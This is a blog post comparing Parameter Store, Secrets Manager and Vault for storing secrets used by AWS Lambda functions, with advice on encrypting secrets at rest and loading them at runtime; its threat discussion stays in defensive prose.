AWS Lambda and Secret Management

Werner Vogels, the CTO of Amazon, describes AWS Lambda as the “connective tissue” for your cloud-native application. It’s an apt description, as AWS Lambda functions often connect to many services to transform and move data between them. Many of these services require you to authenticate your application with credentials or API keys. How to securely store and manage these application secrets is. Therefore, a question frequently asked by serverless developers.

In terms of managing application secrets, there are many tools available to you, including:

The question is: which should you use, and when?

There is also the question of how to deploy these secrets to your function. Some common approaches include:

  • Storing secrets in environment variables during deployment.
  • Storing secrets in the deployment artifact during deployment.
  • Loading secrets at runtime.

In this post, we will explore both of these questions, and give you some guidance on how to choose between the various options.

Parameter Store vs. Secrets Manager vs. Vault

As a serverless developer, these are the characteristics you should look for in a secrets management tool:

  • Secrets encryption at rest and in-flight.
  • Role-based access.
  • Cost effective.
  • Scalable.
  • A fully managed service, so developers don’t have to worry about provisioning and managing servers.

Parameter Store

Parameter Store ticks a lot of boxes:

  • Secrets are encrypted at rest and transmitted securely via HTTPS.
  • It has fine-grained access control via IAM. Lambda functions are given access only to the parameters they need.
  • It can be used through the AWS Console and AWS CLI, and via its HTTPS API.
  • It records a history of changes.
  • It’s free to use!

Parameter Store 2

Parameter Store 1

The one downside of Parameter Store is its low throttling limit, around 100 requests per second. Unfortunately, this limit is not listed on the AWS Systems Manager Limits page, and you can’t raise it via a support ticket either. That said, as with a lot of the hard AWS limits, it’s possible to increase the throttling limit if you have a convincing use case. You would have to work with your AWS account manager and present your argument. Of course, this process takes time, so you cannot rely on it if you run into throttling problems in production.

If you only load parameters during the CI/CD pipeline, you should be safe from the low throttling limit. However, if you are loading parameters at runtime (more on this later), the low throttling limit presents a real issue.

Secret Manager

Like Parameter Store, Secrets Manager uses AWS KMS to encrypt data at rest and controls access via fine-grained IAM permissions. It can also be handled through the AWS Console and AWS CLI, and via its HTTPS API.

The notable differences between Parameter Store and Secrets Manager are:

  • Secrets Manager’s throttling limit is much higher, at 700 GetSecretValue requests per second.
  • Secrets Manager is not a free service. At $0.40 per secret per month and $0.05 per 10,000 API calls, it can be expensive when used at scale.
  • Secrets Manager does not store the history of changes.

Also, Secrets Manager supports secrets rotation out of the box, which is a compelling feature. For Amazon RDS databases, it can even rotate the credentials for you automatically, saving you from implementing the rotation logic yourself. For other types of secrets, you can implement a custom rotation logic using a Lambda function.

Vault

Vault encrypts and stores the data in a number of supported backend storages, including Filesystem, Amazon S3, Google Cloud Storage, and MongoDB. Similar to Secrets Manager, Vault also supports key rotation out of the box.

Compared to Parameter Store and Secrets Manager, Vault is a more fully-fledged solution for the enterprise. It supports some use cases beyond general storage for application secrets. However, it also falls short on many fronts:

  • It’s not a managed service. You’d have to run and operate Vault as a service yourself.
  • Its rich feature set and extensibility also add to the learning curve. If you work mostly with AWS Lambda, you won’t need many of these features.
  • You have to run multiple EC2 instances to achieve high availability. It adds operational overhead.
  • From the client’s perspective, it’s designed to work with the Vault agent. This setup doesn’t work with AWS Lambda, as there’s nowhere for you to install the agent. It means you won’t be able to quickly load secrets at runtime (more on this later).

Some might argue that running EC2 instances in multiple Availability Zones could be costly. But, even a t3.micro ($0.0104/hour) instance can handle a fair amount of traffic. An N+2 setup would therefore only cost around $20 per month, and you probably won’t ever need more than that.

At a scale where thousands of secrets are accessed frequently, I believe Vault would work out a lot cheaper than Secrets Manager. However, this is assuming your team has the necessary skill set to set up and run Vault. If you need to bring in experts, the additional cost would likely far exceed what you would pay for Secrets Manager.

Which Option Should You Choose?

Based on the criteria we outlined earlier, all three solutions meet the basic feature requirements. They all support encryption at rest and in-flight, and all have a mechanism for granting role-based access to your secrets.

My recommendation is according to your needs:

  • Something simple and less than 100 requests per second – go with Parameter Store.
  • Secret rotation (e.g., you are using Amazon RDS) or need higher throughput than 100 requests per second – go with Secrets Manager.
  • A large number of secrets and are concerned with runaway monthly cost – go with Vault – if, and only if, you also have the necessary skill set to set up and run it yourself. Otherwise, stick with Secrets Manager and find ways to consolidate secrets to help reduce cost.

Secret Managers Comparison

Deploying Secrets to Functions

Being able to store application secrets securely is a must, but it’s only part of the story. You also need a way to safely deploy the secrets to your Lambda functions and ensure they are secured at runtime.

Rule of Thumb

My rule-of-thumb is to never store secrets in plain text in the environment variables or the deployment artifact. If a function is compromised through a compromised dependency or code injection attack, the attacker can easily steal data from environment variables or the function folder. PureSec’s FunctionShield library can block attempts to transmit stolen data out of your function, but it’s not bulletproof either.

Many developers would fetch the secrets from Parameter Store/Secrets Manager/Vault as part of their CI/CD pipeline, and bake them into environment variables in plain text. Unfortunately, this is also the behavior of the built-in Parameter Store support for the Serverless Framework and many of its community-driven plugins.

Other Approaches

A common variant of this approach is to put the decrypted secrets in a file and include them in the deployment artifact (ZIP file) that is uploaded to Amazon S3. During cold start, the Lambda function reads this file to fetch the secrets. Because the secrets are still stored in plain text, it’s therefore still vulnerable. An attacker can compress the content of the function’s execution folder and send the resulting ZIP file for snooping.

Secrets should always be encrypted at rest, including in the deployment artifacts and function configurations. To ensure this, you need to store them in encrypted form and decrypt them at runtime. This is why my preferred approach is to load and decrypt the application secrets during a cold-start. Parameter Store and Secrets Manager perform both steps in a single API call. The decrypted secrets are then cached and optionally refreshed periodically. The middy middleware engine already supports this approach with both Parameter Store and Secrets Manager.

SSM Parameter Store

This approach has the added benefit of being able to rotate secrets behind the scenes without having to redeploy your functions. But it’s not without shortcomings. For example, you incur additional cold start latency, as the function needs to fetch and decrypt secrets from either Parameter Store or Secrets Manager. From experience, this can add ~50ms to cold start time when the function has a single secret. It goes up to ~150ms by the time the function needs to fetch and decrypt ten secrets. Also, as discussed earlier, it’s difficult to implement this approach with Vault since there is no way to install the Vault agent.

Conclusions

In summary, you should start with Parameter Store if your use case is simple and you don’t need high throughput. As your use case becomes more sophisticated, you should consider Secrets Manager or Vault. Vault can cater for use cases beyond storing application secrets and is used in many enterprises already. However, when considering the cost of Secrets Manager vs. Vault, take into account the headcount cost if you need to bring in expertise to run it.

When it comes to deploying the secrets to the function, you should follow the same guideline:  secrets should be encrypted at rest. Never store secrets in plain text in a function’s environment variables or its deployment artifacts. Instead, load, decrypt and cache the secrets at runtime. But bear in mind that this approach introduces additional latency during cold start.